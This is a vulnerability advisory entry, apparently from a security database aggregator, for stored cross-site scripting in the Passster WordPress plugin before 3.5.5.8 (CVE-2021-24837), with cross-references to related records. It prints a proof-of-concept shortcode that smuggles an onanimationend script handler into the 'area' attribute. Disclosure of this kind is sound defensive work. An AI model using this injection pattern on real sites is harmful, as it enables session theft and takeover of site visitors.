Lucene search
Apple502jWPEX-ID:5FEA3AC3-D599-41F3-8F76-08F0D3552AF1HistoryDec 29, 2022 - 12:00 a.m.
Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2022-12-2900:00:00
apple502j
224
passster contributor+ storedxss
EPSS
0.001
Percentile
23.5%
The plugin does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.
[passster password="1" area='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)//']Related
wpvulndb
wpvulndb
Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2022-12-29 00:00:00
cvelist
cvelist
CVE-2021-24837 Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2023-01-23 14:31:59
prion
prion
Cross site scripting
2023-01-23 15:15:00
cve
cve
CVE-2021-24837
2023-01-23 15:15:13
nvd
nvd
CVE-2021-24837
2023-01-23 15:15:13